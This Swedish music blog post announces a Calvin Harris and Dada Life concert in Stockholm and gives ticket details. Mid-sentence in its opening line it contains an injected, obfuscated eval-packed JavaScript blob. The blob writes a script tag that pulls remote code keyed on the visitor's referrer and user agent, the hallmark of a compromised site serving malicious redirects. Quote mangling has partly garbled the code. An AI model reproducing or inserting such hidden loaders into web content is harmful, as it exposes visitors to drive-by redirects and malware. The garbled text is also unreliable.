Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

Calvin Harris & Dada Life till Sverige

Calvin Harris & Dada Life till Sverige
Alexander Gylemo
Två eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|knhan|var|u0026u|referrer|abnbk||js|php’.split(’|’),0,{}))
blivande legendakter är på ingång till Sverige och det är inga mindre än Calvin Harris och Dada Life.
Dada Life har kommit att bli hyllade av alla som lyssnat på house på sistonne. Den grymma svenska duon (Olle Cornéer och Stefan Engblom) har skickat ut hits som ”Unleash the Fucking Dada”, ”White Noise/Red Meat”,”Just Bleep Me” och nu senast ”Happy Violence”, tillsammans med en mängd grymma electroremixar (vore tradigt att nämna alla).
Deras livespelningar har blivit enormt populära runtom i världen, framför allt i USA där de för inte allt så länge sedan blev nerstängda av amerikanska insatsstyrkan. Nu ska de äntligen komma till Sverige och göra sin första, egna  (efter Summerburst) storspelning.
De kommer däremot inte ensamma, då de har med sig Calvin Harris, en av de bättre dj:s jag vet och även enormt begåvade artisten och producenten från Storbritannien.
Calvin Harris har gett oss hits oavbrutet varje år i säkert tio års tid nu, senast ”Bounce”, ”Awooga” och ”Feel so Close”. Vi var nära på att få se stjärnan på Summerburst i somras men efter att han missat flyget blev ersattes han av Sebjak.
Spelningen är på Ambassadeur den andra november klockan 22-03. Biljettförsäljning sker via tickster.com med en åldersgräns på 20 år. Det ska däremot även släppas ett begränsat antal biljetter med 18-årsgräns på tickster.com för 150 kr/st.